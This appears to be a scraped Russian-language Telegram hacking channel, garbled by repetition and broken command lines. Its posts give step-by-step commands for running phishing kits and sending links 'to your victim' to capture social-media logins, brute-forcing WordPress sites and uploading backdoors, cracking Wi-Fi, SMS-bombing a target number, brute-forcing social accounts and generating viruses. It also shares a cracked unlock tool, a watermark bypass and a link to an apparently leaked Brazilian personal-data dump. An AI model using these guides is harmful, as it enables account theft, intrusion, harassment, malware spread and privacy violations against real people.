Open_Source_Intelligence_Techniques_Resources_for_Searching_and.pdf
22.4 MB
«Open Source Intelligence Techniques: Resources for Searching and Analyzing Online Information» 8th Edition by Michael Bazzell (2021)
Устанавливаем расширенные инструменты фишинга в Termux
Доброе утро, друзья! Я выбрал два продвинутых инструмента для фишинга, которые вы можете использовать на Termux,
Как установить Adv Phishing Tool в Termux?
Adv Phishing является одним из лучших и самых современных инструментов для фишинга, с помощью этого инструмента вы можете взломать любые учетные записи в социальных сетях, включая Tiktok, Facebook, Whatsapp, Instagram и т. д.
Следуйте инструкциям, чтобы начать:
▫️Установить Termux из Playstore
▫️Введите команды одну за другой
Ngrok будет загружен в течение нескольких минут, после чего вам будет предложено обновить ключ API Ngrok.
Просто зайдите на ngrok.com и зарегистрируйтесь там, вы получите ключ API, скопируйте и вставьте его в наш Termux
Теперь все в порядке, если вы не нашли интерфейс, просто запустите Adv Phishing Tool, набрав:
Отправьте ссылку своей жертве, если он/она ввел данные для входа, вы получите их. Вот некоторые ограничения с ngrok, если вы злоупотребляете инструментом, ссылка не будет работать. Для этого есть еще один инструмент, известный как SocialPhish, вы можете установить его в Termux.
Введите команды, чтобы начать:
Доброе утро, друзья! Я выбрал два продвинутых инструмента для фишинга, которые вы можете использовать на Termux,
Как установить Adv Phishing Tool в Termux?
Adv Phishing является одним из лучших и самых современных инструментов для фишинга, с помощью этого инструмента вы можете взломать любые учетные записи в социальных сетях, включая Tiktok, Facebook, Whatsapp, Instagram и т. д.
Следуйте инструкциям, чтобы начать:
▫️Установить Termux из Playstore
▫️Введите команды одну за другой
termux-setup-storage
apt update && apt upgrade
pkg install git
git clone https://github.com/Ignitetch/AdvPhishing.git
cd AdvPhishing && ls
chmod 777 *
./Android-Setup.sh
Этот раздел будет для вас непростым, поэтому внимательно следите за ним.Ngrok будет загружен в течение нескольких минут, после чего вам будет предложено обновить ключ API Ngrok.
Просто зайдите на ngrok.com и зарегистрируйтесь там, вы получите ключ API, скопируйте и вставьте его в наш Termux
Теперь все в порядке, если вы не нашли интерфейс, просто запустите Adv Phishing Tool, набрав:
./AdvPhishing.sh
Теперь выберите нужную социальную сеть, и вы получите ссылку (если ссылка не сгенерирована, включите Mobile Hotspot).Отправьте ссылку своей жертве, если он/она ввел данные для входа, вы получите их. Вот некоторые ограничения с ngrok, если вы злоупотребляете инструментом, ссылка не будет работать. Для этого есть еще один инструмент, известный как SocialPhish, вы можете установить его в Termux.
Введите команды, чтобы начать:
pkg install git
git clone https://github.com/xHak9x/SocialPhish.git
cd SocialPhish
chmod +x socialphish.sh
./socialphish.sh
Вот и все, вы получите интерфейс, подобный предыдущему инструменту, просто выберите платформы социальных сетей, и вы получите ссылку, чтобы отправить ее своей жертве ✌️
Сервис поиска взломанных и украденных данных
DeHashed - сервис поиска по базе взломанных и украденных персональных данных.
Вы можете выполнять поиск по IP-адресам, адресам электронной почты, логинам, телефонным номерам, VIN номерам, домашним адресам др. Сервис предлагает реверсивный поиск по паролям, хеш-суммам и другим типам данных.
DeHashed - сервис поиска по базе взломанных и украденных персональных данных.
Вы можете выполнять поиск по IP-адресам, адресам электронной почты, логинам, телефонным номерам, VIN номерам, домашним адресам др. Сервис предлагает реверсивный поиск по паролям, хеш-суммам и другим типам данных.
Брутфорсим сайты на WordPress и загружаем на них backdoor
Как узнать стоит ли сайт на вордпресс ? Все просто! Допишите к домену "/wp-admin", если вам выдает панель для входа в админку - это вордпресс, если нет, значит не повезло, нужен другой сайт.
Установка:
$
$
$ python wpforce.py -u <логин> -p <пароль> -t <ссылка>
Хакинг в хату ✌️фс
Как узнать стоит ли сайт на вордпресс ? Все просто! Допишите к домену "/wp-admin", если вам выдает панель для входа в админку - это вордпресс, если нет, значит не повезло, нужен другой сайт.
Установка:
$
git clone https://github.com/n00py/WPForce.git
$ cd WPForce
Брутфорс:$
python wpforce.py -i <логины> -w <пароли> -u <ссылка>
Backdoor:$ python wpforce.py -u <логин> -p <пароль> -t <ссылка>
Хакинг в хату ✌️фс
👍1
Атакуем беспроводные сети
Shell-скрипт для атаки на беспроводные соединения с использованием встроенных инструментов Kali. Поддерживает WEP, WPS, WPA, WPA2.
Установка в Kali Linux:
$
$
Shell-скрипт для атаки на беспроводные соединения с использованием встроенных инструментов Kali. Поддерживает WEP, WPS, WPA, WPA2.
Установка в Kali Linux:
$
git clone https://github.com/esc0rtd3w/wifi-hacker
$ cd wifi-hacker
Использование:$
bash wifi-hacker
$ chmod +x wifi-hacker
$ ./wifi-hacker
Работаем, парни ✌️
👍1
Вывод с QiWi без комиссии
И так, вчера "Киви" подключились к системе быстрых платежей, что даёт нам теперь возможность выводить на пластик без комиссии.
1. Переходим на главный экран киви с телефона, смотрим на вкладку платежи и переводы, там листаем и видим значок СБП;
2. Нажимаем и следуем инструкциям, уточню тот момент, что минимальный статус для подключения этой системы - Основной;
3. sbp.nspk.ru/participants - здесь информация о банках, подключенных к этой системе, туда можно выводить без комиссии;
Вывод доступен без комиссии на такие сервисы как: Сбербанк, Тинькофф, ЮМани, VKPay, АльфаБанк, WebMoney и т.д.
И так, вчера "Киви" подключились к системе быстрых платежей, что даёт нам теперь возможность выводить на пластик без комиссии.
1. Переходим на главный экран киви с телефона, смотрим на вкладку платежи и переводы, там листаем и видим значок СБП;
2. Нажимаем и следуем инструкциям, уточню тот момент, что минимальный статус для подключения этой системы - Основной;
3. sbp.nspk.ru/participants - здесь информация о банках, подключенных к этой системе, туда можно выводить без комиссии;
Вывод доступен без комиссии на такие сервисы как: Сбербанк, Тинькофф, ЮМани, VKPay, АльфаБанк, WebMoney и т.д.
Как узнать где сейчас находятся спутники Starlink
Несколько месяцев назад компания Илона Маска Starlink вывела на орбиту 60 своих спутников. Они находятся на достаточно низкой орбите, соответственно их можно увидеть с Земли. На набравшем высокую популярность видео это выглядит, как ровно пролетающая линия маленьких светящихся точек.
Однако как же узнать пролетают ли эти спутники в вашем регионе или нет? В этом поможет Gpredict. Это программа, моделирующая перемещение спутников на средней и низкой орбитах, что как раз подходит для аппаратов Starlink.
Установка
Устанавливаем необходимые пакеты:
После установки запускаем программу вписав в терминал
Для начала нужно настроить свое местоположение. Перейдя по вкладкам "Edit" - "Preferences" - "Ground Station", нужно будет изменить значения долготы и широты в соответствующем поле.
Далее нужно будет обновить базу спутников перейдя в "Edit" - "Update TLE" и кликнув по "From network". Далее в верхнем правом углу кликаем на иконку стрелки вниз - "Module and options". Вводим в поиск STARLINK и выбираем соответствующий спутник.
Либо если спутники сами по себе не установятся, по пути "Edit" - "Update TLE" можно выбрать "From local file", после чего открыть файл .txt, предварительно сохранив в него эту строку
Несколько месяцев назад компания Илона Маска Starlink вывела на орбиту 60 своих спутников. Они находятся на достаточно низкой орбите, соответственно их можно увидеть с Земли. На набравшем высокую популярность видео это выглядит, как ровно пролетающая линия маленьких светящихся точек.
Однако как же узнать пролетают ли эти спутники в вашем регионе или нет? В этом поможет Gpredict. Это программа, моделирующая перемещение спутников на средней и низкой орбитах, что как раз подходит для аппаратов Starlink.
Установка
Устанавливаем необходимые пакеты:
install libtool intltool autoconf automake libcurl4-openssl-devСкачиваем репозиторий с github
apt-get install pkg-config libglib2.0-dev libgtk-3-dev libgoocanvas-2.0-dev
clone https://github.com/csete/gpredict.gitПереходим в папку, ставим права на устанавливающий файл и запускаем его
+x autogen.shДалее конфигурируем, собираем и устанавливаем программу
bash autogen.sh
Использование
make
make install
После установки запускаем программу вписав в терминал
Для начала нужно настроить свое местоположение. Перейдя по вкладкам "Edit" - "Preferences" - "Ground Station", нужно будет изменить значения долготы и широты в соответствующем поле.
Далее нужно будет обновить базу спутников перейдя в "Edit" - "Update TLE" и кликнув по "From network". Далее в верхнем правом углу кликаем на иконку стрелки вниз - "Module and options". Вводим в поиск STARLINK и выбираем соответствующий спутник.
Либо если спутники сами по себе не установятся, по пути "Edit" - "Update TLE" можно выбрать "From local file", после чего открыть файл .txt, предварительно сохранив в него эту строку
GROUP TLE FILE 1 74001U 19644A 19144.95562291 .00000000 00000-0 50000-4 0 06 2 74001 53.0084 171.3414 0001000 0.0000 72.1720 15.40507866 07Готово! На экране отобразятся спутники Starlink в режиме реального времени.
👍5🔥2
Мощный смс бомбер impulse
Данный бомбер имеет более 60-ти сервисов, является кросс-платформенным ПО, работает на Linux, Windows, а также в Termux.
Windows (Необходим Python 3.8)
Загружаем Impulse с гитхаба https://github.com/LimerBoy/Impulse/
Открываем командную строку в директории с ПО
Выполняем команды:
Данный бомбер имеет более 60-ти сервисов, является кросс-платформенным ПО, работает на Linux, Windows, а также в Termux.
Windows (Необходим Python 3.8)
Загружаем Impulse с гитхаба https://github.com/LimerBoy/Impulse/
Открываем командную строку в директории с ПО
Выполняем команды:
pip install -r requirements.txtLinux
•• python impulse.py --help
sudo apt updateTermux
• sudo apt install python3 python3-pip git -y
• git clone https://github.com/LimerBoy/Impulse
• cd Impulse/
• pip3 install -r requirements.txt
• python3 impulse.py --help
pkg updateПример запуска
• pkg install python3 python3-pip git -y
• git clone https://github.com/LimerBoy/Impulse
• cd Impulse/
• pip3 install -r requirements.txt
• python3 impulse.py --help
python3 impulse.py --method SMS --time 20 --threads 15 --target +79255554566Бомби, веселись ✌️
Creepy - инструмент OSINT для определения местоположения.
Большинство из нас пристрастились к социальным сетям, и обмен изображениями - одна из наиболее часто используемых функций этих платформ. Но иногда, когда мы делимся этими фотографиями, это не только изображение, которым мы делимся, но и точное место, где было сделано это изображение.
Creepy - это приложение на Python, которое может извлекать эту информацию и отображать геолокации на карте, фильтрует результаты поиска по точному местоположению и или дате, результаты можно экспортировать в формат csv или kml для дальнейшего анализа в Google Maps.
🔗 Creepy
Большинство из нас пристрастились к социальным сетям, и обмен изображениями - одна из наиболее часто используемых функций этих платформ. Но иногда, когда мы делимся этими фотографиями, это не только изображение, которым мы делимся, но и точное место, где было сделано это изображение.
Creepy - это приложение на Python, которое может извлекать эту информацию и отображать геолокации на карте, фильтрует результаты поиска по точному местоположению и или дате, результаты можно экспортировать в формат csv или kml для дальнейшего анализа в Google Maps.
🔗 Creepy
Брутфорсим социальные сети
SocialBox - это полноценный фреймворк для проведения брутфорс атаки на такие соц-сети, как Facebook, Gmail, Instagram, Twitter.
Установка
$
$
SocialBox - это полноценный фреймворк для проведения брутфорс атаки на такие соц-сети, как Facebook, Gmail, Instagram, Twitter.
Установка
$
git clone https://github.com/samsesh/SocialBox-Termux.git
$ cd SocialBox-Termux
$ chmod +x SocialBox.sh
$ chmod +x install-sb.sh
$ ./install-sb.sh
Использование$
./SocialBox.sh
Более подробнее про данную утилиту читайте на GitHub ✌️
ApowerUnlock 1.0.3.6 rus.rar
15.8 MB
ApowerUnlock + Crack
Универсальный инструмент для быстрой разблокировки iOS-устройств и экрана iPhone / iPad без ввода пароля.
Универсальный инструмент для быстрой разблокировки iOS-устройств и экрана iPhone / iPad без ввода пароля.
Как получить любую премиум фотографию бесплатно без водных знаков
Друзья, думаю многие из вас находили годные картинки на таких ресурсах как: Shutterstock, Gettyimages, Adobe Stock, Alamy, Picfair, но приходилось обламываться из-за вотермарок.
Для любого веб-сайта, кроме SHUTTERSTOCK
Переходим по ссылке и вставляем ссылку на фотографию, которую вы хотите получить;
Для SHUTTERSTOCK
Переходим по ссылке, создаем учетную запись, а затем загрузите все, что хотите.
Всем халявный премиум, друзья ✌️
Друзья, думаю многие из вас находили годные картинки на таких ресурсах как: Shutterstock, Gettyimages, Adobe Stock, Alamy, Picfair, но приходилось обламываться из-за вотермарок.
Для любого веб-сайта, кроме SHUTTERSTOCK
Переходим по ссылке и вставляем ссылку на фотографию, которую вы хотите получить;
Для SHUTTERSTOCK
Переходим по ссылке, создаем учетную запись, а затем загрузите все, что хотите.
Всем халявный премиум, друзья ✌️
👍5
vbug - инструмент для быстрого создания вирусов, имеющий возможность выбрать между тремя типами вирусов: Anvima - для Android, WinVima - для Windows и MACvima - для MACOS.
Установка
$
$
Установка
$
apt-get update && apt-get upgrade
$ git clone https://github.com/Gameye98/vbug
Использование$
python vbug.py
Более подробно об использовании утилиты можно почитать на GitHub репозитория ✌️
Leak Brazilian #FuckTheGoverment
https://drive.google.com/file/d/1y4ih7q9jurr9iC2N6YT9Y7r-4939jeUw/view
https://www.google.com/amp/s/brasil.elpais.com/brasil/2021-01-26/todos-os-brasileiros-estao-com-seus-dados-a-venda-e-ha-muito-pouco-o-que-se-pode-fazer-para-se-proteger.html%3foutputType=amp
https://drive.google.com/file/d/1y4ih7q9jurr9iC2N6YT9Y7r-4939jeUw/view
https://www.google.com/amp/s/brasil.elpais.com/brasil/2021-01-26/todos-os-brasileiros-estao-com-seus-dados-a-venda-e-ha-muito-pouco-o-que-se-pode-fazer-para-se-proteger.html%3foutputType=amp
EL PAÍS
Todos os brasileiros estão com seus dados à venda e há muito pouco o que se pode fazer para se proteger
Megavazamento expõe 223 milhões de CPFs e promete ficha completa em troca de bitcoins. Caso é prova de fogo para a recém-criada Autoridade Nacional de Proteção de Dados